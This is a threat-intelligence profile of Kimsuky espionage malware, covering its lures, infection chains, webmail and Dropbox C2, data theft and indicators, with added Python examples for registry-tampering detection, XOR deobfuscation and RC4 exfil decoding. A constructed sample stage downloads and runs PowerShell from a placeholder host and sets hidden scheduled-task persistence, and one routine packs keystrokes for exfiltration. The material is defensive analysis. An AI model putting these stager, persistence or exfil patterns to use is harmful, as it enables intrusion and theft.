Kimsuky is a North Korea-linked cyber-espionage malware/threat cluster associated with targeted operations primarily against South Korean organizations, including think tanks, political and unification-related entities, government-linked institutions, and in one reported case a pharmaceutical-themed target. Reported campaigns used spear-phishing and socially engineered lures such as weaponized Hangul Word Processor (HWP) documents and Windows LNK files disguised as business documents, including a personal-information consent form and an ERP specification document.
Capabilities attributed to Kimsuky malware in the underlying reports include host reconnaissance, information theft, keylogging, form-grabbing that extracts e-mail addresses and passwords from web forms, directory and process listing, theft of HWP documents, persistence via Windows services and scheduled tasks, UAC bypass, and remote control through modified TeamViewer components. Several reports describe malware that disables or weakens host defenses by modifying registry settings for Windows Firewall, Windows Security Center, and the AhnLab V3 firewall.
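One way to hunt for the registry-based defense tampering described above, as an added example that is not code from the page or from any vendor report: a Python triage routine over Sysmon Event ID 13 (RegistryEvent SetValue) records. The Security Center, Windows Firewall and Defender policy paths are real Windows registry locations; the AhnLab pattern is a placeholder assumption, because the reports name the product but not its registry path; and the event records are constructed sample data, not telemetry from any incident. The writer-image check ties the finding to the 32-bit PowerShell and C:\sysconfigs artifacts the LNK chain used.

```python
import re

# Sysmon Event ID 13 (RegistryEvent SetValue) is the usual telemetry source.
# Each entry: (regex over TargetObject, label, predicate on the written DWORD meaning "defense weakened").
# Security Center, Firewall and Defender paths are real Windows locations; the AhnLab pattern is an
# ASSUMPTION used as a placeholder, since the reports name the product but not its registry key.
WATCHED = [
    (re.compile(r"\\Microsoft\\Security Center\\(AntiVirusDisableNotify|FirewallDisableNotify|"
                r"UpdatesDisableNotify|AntiVirusOverride|FirewallOverride)$", re.I),
     "Security Center notification/override", lambda v: v is None or v != 0),
    (re.compile(r"\\SharedAccess\\Parameters\\FirewallPolicy\\\w+Profile\\EnableFirewall$", re.I),
     "Windows Firewall profile", lambda v: v == 0),
    (re.compile(r"\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware$", re.I),
     "Windows Defender policy", lambda v: v is None or v != 0),
    (re.compile(r"\\AhnLab\\", re.I),
     "AhnLab V3 (placeholder path, assumption)", lambda v: True),
]

# Writers that raise severity: 32-bit script hosts under SysWOW64, or anything running from C:\sysconfigs.
SUSPICIOUS_IMAGE = re.compile(r"\\SysWOW64\\.*(powershell|wscript|cscript)\.exe$|^C:\\sysconfigs\\", re.I)

# Sysmon renders DWORD values as "DWORD (0x00000001)".
DWORD_RE = re.compile(r"DWORD \((0x[0-9a-f]+)\)", re.I)


def parse_dword(details):
    """Return the integer behind a Sysmon DWORD rendering, or None for other value types."""
    m = DWORD_RE.search(details or "")
    return int(m.group(1), 16) if m else None


def triage(records):
    """Return one finding per registry write that weakens a watched defense setting."""
    findings = []
    for r in records:
        if r.get("EventID") != 13:          # only SetValue events carry the written data
            continue
        value = parse_dword(r.get("Details"))
        for pattern, label, weakens in WATCHED:
            if pattern.search(r["TargetObject"]) and weakens(value):
                findings.append({
                    "label": label,
                    "key": r["TargetObject"],
                    "value": value,
                    "image": r["Image"],
                    "severity": "high" if SUSPICIOUS_IMAGE.search(r["Image"]) else "medium",
                })
                break
    return findings


# Constructed sample events (not real telemetry). The first two should be flagged, the rest should not.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\netsh.exe",   # turning the firewall ON is not tampering
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",           # unrelated key
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 12, "Image": r"C:\Windows\System32\services.exe",  # key create, no value written
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Security Center", "Details": None},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['label']}: {f['key']} = {f['value']} by {f['image']}")
```

The predicate per key matters: a write of EnableFirewall=1 or AntiVirusDisableNotify=0 restores protection and should not page anyone, so the rule checks direction, not just the path.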
Several delivery and execution chains are described. One campaign used malicious HWP files that exploited a vulnerability in the HWPTAG_PARA_LINE_SEG structure to drop DLL backdoors into %TEMP% and %SYSTEM%, register them as service DLLs, and carry out espionage.

Another used a malicious LNK carrying obfuscated PowerShell that fetched and executed further PowerShell stages filelessly, wrote downloader and loader scripts to disk, established persistence through Windows Task Scheduler, opened a benign decoy document, and deleted the original shortcut.

A separate LNK sample themed as "화이트 생명과학 ERP 사양서.lnk" (roughly "White Life Science ERP Specification.lnk") embedded a decoy .xlsx, scheduled-task XML, a JavaScript launcher, and an XOR-obfuscated PowerShell payload. It stored these components under C:\sysconfigs, persisted through a scheduled task named "Avast Secure Browser VPS Differential Update Ex" (a name chosen to resemble a legitimate updater), and launched 32-bit PowerShell from the SysWOW64 directory.
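Recovering the XOR-obfuscated PowerShell stage from a dropped component such as C:\sysconfigs\sop0ef903r is a routine triage step. The following is an added example, not code from the page or from any vendor analysis: it recovers a repeating XOR key without knowing it, by making each key-byte lane look most like text and then choosing the key length whose full decode contains the most PowerShell markers. The key length, the key bytes, and the stage contents are constructed assumptions (the reports do not publish the payload); the URL uses the reserved .invalid TLD so it never resolves.

```python
from itertools import cycle

# Substrings a decoded PowerShell stage almost always contains; counted case-insensitively.
PS_MARKERS = [b"new-object", b"invoke-", b"net.webclient", b"downloadstring",
              b"frombase64string", b"start-process", b"schtasks", b"-w hidden", b"$"]


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call obfuscates and deobfuscates."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def text_score(buf: bytes) -> int:
    """Crude plaintext likelihood: reward lowercase letters and spaces, tolerate other
    printable ASCII, punish control and non-ASCII bytes hard."""
    s = 0
    for b in buf:
        if 0x61 <= b <= 0x7A or b == 0x20:
            s += 2
        elif 0x20 < b < 0x7F or b in (0x09, 0x0A, 0x0D):
            s += 1
        else:
            s -= 8
    return s


def marker_hits(buf: bytes) -> int:
    """Number of PowerShell marker occurrences in a candidate decode."""
    low = buf.lower()
    return sum(low.count(m) for m in PS_MARKERS)


def recover_key(blob: bytes, max_len: int = 4) -> bytes:
    """Recover a repeating XOR key of length 1..max_len.
    Each key byte is chosen independently so that its lane (every klen-th byte) scores most
    like text; the key length is then chosen by the quality of the full decode, with shorter
    keys winning ties (so a 1-byte key is not reported as a repeated 2-byte key)."""
    best_key, best_score = b"", float("-inf")
    for klen in range(1, max_len + 1):
        key = bytearray()
        for pos in range(klen):
            lane = blob[pos::klen]
            key.append(max(range(256), key=lambda c: text_score(bytes(b ^ c for b in lane))))
        decoded = xor_bytes(blob, bytes(key))
        s = text_score(decoded) + 50 * marker_hits(decoded)
        if s > best_score:
            best_key, best_score = bytes(key), s
    return best_key


def deobfuscate(blob: bytes, max_len: int = 4):
    """Return (key, plaintext, looks_like_powershell); the flag guards against handing back garbage."""
    key = recover_key(blob, max_len)
    plain = xor_bytes(blob, key)
    return key, plain, marker_hits(plain) >= 3


# Constructed stand-in for an obfuscated stage (ASSUMPTION: 3-byte key; contents are invented).
SAMPLE_KEY = bytes([0x7A, 0x13, 0xC4])
SAMPLE_STAGE = (
    b"$wc = New-Object Net.WebClient\n"
    b"$u = 'http://stage.example.invalid/s2.ps1'\n"
    b"$data = $wc.DownloadString($u)\n"
    b"Invoke-Expression $data\n"
    b"schtasks /create /tn 'Update Ex' /tr 'powershell -w hidden' /sc minute\n"
)
SAMPLE_BLOB = xor_bytes(SAMPLE_STAGE, SAMPLE_KEY)

if __name__ == "__main__":
    key, plain, ok = deobfuscate(SAMPLE_BLOB)
    print("key:", key.hex(), "powershell-like:", ok)
    print(plain.decode())
```

The per-lane scoring is what makes this work on unknown keys: a wrong key byte turns every space in that lane into punctuation and every newline into a control byte, so the true byte wins by a wide margin even on a few dozen bytes of lane. Raise max_len if a sample resists; the cost grows only linearly.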
Command-and-control and exfiltration methods described include abuse of webmail accounts and of legitimate cloud and web services. Earlier Kimsuky malware used mail.bg and other webmail providers, including zoho.com, mail.com, india.com, opera.com, and indiatimes.com, to send stolen data as e-mail attachments to operator-controlled "master" accounts. Other variants used the Dropbox API to upload victim information and to download BAT command files for execution, free web hosting on bugs3.com, and FTP service from dothome.co.kr. The malware also queried external services such as OpenDNS to learn the victim's public IP address.
Victim data the reports describe as collected includes domain and username, OS version, public IP address, a MAC-derived victim identifier, installed security product information, network configuration, drive information, recently modified files, running processes, systeminfo output, computer name, directory listings, and keystrokes. Some variants encrypted exfiltrated data with RC4 using MD5-derived keys and protected the key material with RSA; another PowerShell sample applied RC4 and then Base64 encoding to selected fields.
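The RC4-with-MD5-derived-key scheme above is simple enough that an analyst can reproduce it to decode captured exfiltration once the key material is recovered from the sample. The following is an added example, not code from the page or from any reported sample: it builds an exfil record in the "RC4 then Base64 on selected fields" style and decodes it again. The passphrase, field names, and field values are constructed (the public IP is from the TEST-NET-3 documentation range); the RSA wrapping of key material mentioned in the reports is not shown. A published RC4 test vector is included so the cipher core can be checked independently.

```python
import base64
import hashlib


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (key-scheduling plus PRGA). Symmetric: one call both encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # PRGA, XORed onto the data
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def derive_key(secret: str) -> bytes:
    """RC4 key = MD5(secret): the derivation the reports describe. The secret itself is an assumption."""
    return hashlib.md5(secret.encode("utf-8")).digest()


def pack_report(fields: dict, secret: str, encrypted_fields: set) -> dict:
    """Build an exfil record: selected fields are RC4-encrypted then Base64-encoded, others sent in the clear."""
    key = derive_key(secret)
    report = {}
    for name, value in fields.items():
        if name in encrypted_fields:
            report[name] = base64.b64encode(rc4_crypt(key, value.encode("utf-8"))).decode("ascii")
        else:
            report[name] = value
    return report


def unpack_report(report: dict, secret: str, encrypted_fields: set) -> dict:
    """Reverse pack_report: what an analyst does after pulling the secret out of the sample."""
    key = derive_key(secret)
    return {
        name: rc4_crypt(key, base64.b64decode(value)).decode("utf-8") if name in encrypted_fields else value
        for name, value in report.items()
    }


# Constructed sample (not from any incident): operator secret, which fields are protected, and host data.
SAMPLE_SECRET = "operator-passphrase"
ENCRYPTED_FIELDS = {"user", "keystrokes"}
SAMPLE_FIELDS = {
    "host": "WS-FIN-07",
    "user": "CORP\\jdoe",
    "os": "Microsoft Windows 10 Pro 10.0.19045",
    "public_ip": "203.0.113.45",
    "keystrokes": "login: jdoe\tpassword: hunter2\n",
}

if __name__ == "__main__":
    wire = pack_report(SAMPLE_FIELDS, SAMPLE_SECRET, ENCRYPTED_FIELDS)
    print("on the wire:", wire)
    print("recovered:  ", unpack_report(wire, SAMPLE_SECRET, ENCRYPTED_FIELDS))
```

Because RC4 is a stream cipher with no integrity check, a wrong passphrase does not fail loudly; it yields bytes that usually are not valid UTF-8. Treat a UnicodeDecodeError from unpack_report as "wrong key", not as a corrupt capture.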
Notable indicators and artifacts directly mentioned include the lure filename "화이트 생명과학 ERP 사양서.lnk"; hashes MD5 5c3bf036ab8aadddb2428d27f3917b86, SHA-1 e9c16aa2e322a65fc2621679ca8e7414ebcf89c0, and SHA-256 d4c184f4389d710c8aefe296486d4d3e430da609d86fa6289a8cea9fde4a1166; dropped or persisted files such as C:\sysconfigs\opakib.ps1, C:\sysconfigs\copa08o.js, C:\sysconfigs\sop0ef903r, %SystemRoot%\System32\telnet.dll, KBDLV2.DLL, AUTO.DLL, ~tmp.dll, telmgr.dll, olethk64.dll, browsesc.dll, and TeamViewer-related components; and service/task names including TelnetManagement, DriverManage, WebService, WebClientManager, Remote Access Service, and "Avast Secure Browser VPS Differential Update Ex."
The source reporting compares the information-stealing PowerShell script's behavior to past Kimsuky-linked activity but does not assign it a specific malware family name beyond that reference.
A malicious LNK-based infection chain attributed to Kimsuky in the source reporting. The LNK is disguised as an Excel document; it extracts decoy and payload files from itself, establishes persistence via a scheduled task, runs a JavaScript launcher and a PowerShell payload, and uses the Dropbox API for C2, uploading victim information and downloading BAT command files for execution.
Kimsuky is a North Korean-linked APT group using custom malware frameworks for cyberespionage, targeting South Korean political and research organizations.